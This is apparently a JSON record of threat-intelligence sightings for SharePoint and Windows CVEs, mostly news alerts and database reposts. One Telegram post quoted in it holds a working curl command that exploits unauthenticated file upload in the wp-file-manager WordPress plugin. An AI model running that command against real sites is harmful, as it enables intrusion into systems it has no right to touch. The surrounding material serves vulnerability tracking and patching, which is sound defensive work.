{"vulnerability": "cve-2020-1695", "sightings": [{"uuid": "da01ed26-c69c-4bc9-84cd-14c357cff426", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-16952", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:44.000000Z"}, {"uuid": "226d1905-9883-4404-a5d3-45594730069e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-16952", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/sharepoint_ssi_viewstate.rb", "content": "", "creation_timestamp": "2020-10-19T14:32:14.000000Z"}, {"uuid": "ee23ea99-6193-4a4e-813f-cc1b4acd2c63", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-16952", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:25.000000Z"}, {"uuid": "81a3021a-2ddc-447b-837e-28894c45b550", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-16952", "type": "published-proof-of-concept", "source": "https://t.me/cKure/2560", "content": "\u25a0\u25a0\u25a1\u25a1\u25a1 UK NCSC recommends organizations to fix CVE-2020-16952 SharePoint RCE flaw ASAP.\n\nhttps://securityaffairs.co/wordpress/109609/security/ncsc-cve-2020-16952-sharepoint-rce.html", "creation_timestamp": "2020-10-17T16:09:38.000000Z"}, {"uuid": "63069939-1b9f-4ca0-ae3c-92d551300c41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-16952", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/1913", "content": "#Red_Team_Tactics\n1. Code execution via the Windows Update client (wuauclt)\nhttps://dtm.uk/wuauclt\n2. PoC for MS SharePoint Server 2019 DataFormWebPart CreateChildControls Server-Side Include RCE Vulnerability (CVE-2020-16952)\nhttps://srcincite.io/pocs/cve-2020-16952.py.txt\n3. Exploiting CVE-2020-25213 - wp-file-manager wordpress plugin (<6.9) for unauthenticated arbitrary file upload\nhttps://medium.com/@mansoorr/exploiting-cve-2020-25213-wp-file-manager-wordpress-plugin-6-9-3f79241f0cd8\nPoC:\ncurl -ks --max-time 5 -F \"reqid=17457a1fe6959\" -F \"cmd=upload\" -F \"target=l1_Lw\" -F \"mtime[]=1576045135\" -F \"upload[]=@/$file_upload\" \"hxxps://victim.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\"\nhttps://github.com/mansoorr123/wp-file-manager-CVE-2020-25213", "creation_timestamp": "2020-12-29T14:05:21.000000Z"}, {"uuid": "0e9a556b-f113-4546-99fa-4cf2ceb0fc7a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-16952", "type": "seen", "source": "https://t.me/BleepingComputer/8342", "content": "UK urges orgs to patch severe CVE-2020-16952 SharePoint RCE bug\n\nThe U.K. National Cyber Security Centre (NCSC) today issued an alert highlighting the risks behind the recently addressed CVE2020-16952 remote code execution (RCE) vulnerability in\u00a0Microsoft SharePoint Server. [...]\n\nhttps://www.bleepingcomputer.com/news/security/uk-urges-orgs-to-patch-severe-cve-2020-16952-sharepoint-rce-bug/", "creation_timestamp": "2020-10-16T19:37:24.000000Z"}, {"uuid": "cf12a54f-d08c-4a7b-849c-5a91b3532276", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-16958", "type": "seen", "source": "https://t.me/cibsecurity/18414", "content": "\u203c CVE-2020-16963 \u203c\n\n, aka 'Windows Backup Engine Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16964.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2020-12-10T02:35:57.000000Z"}, {"uuid": "674b11a5-e94d-4f62-9399-c353830cb46b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-16959", "type": "seen", "source": "https://t.me/cibsecurity/18414", "content": "\u203c CVE-2020-16963 \u203c\n\n, aka 'Windows Backup Engine Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16964.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2020-12-10T02:35:57.000000Z"}, {"uuid": "1acfad29-ba6e-46b6-bc08-4d8215b5a875", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-16959", "type": "seen", "source": "https://t.me/cibsecurity/18394", "content": "\u203c CVE-2020-16963 \u203c\n\n, aka 'Windows Backup Engine Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16964.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2020-12-10T02:32:56.000000Z"}, {"uuid": "27862d20-de4f-4b08-a650-e65e5126c01d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2020-16958", "type": "seen", "source": "https://t.me/cibsecurity/18394", "content": "\u203c CVE-2020-16963 \u203c\n\n, aka 'Windows Backup Engine Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-16958, CVE-2020-16959, CVE-2020-16960, CVE-2020-16961, CVE-2020-16962, CVE-2020-16964.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2020-12-10T02:32:56.000000Z"}]}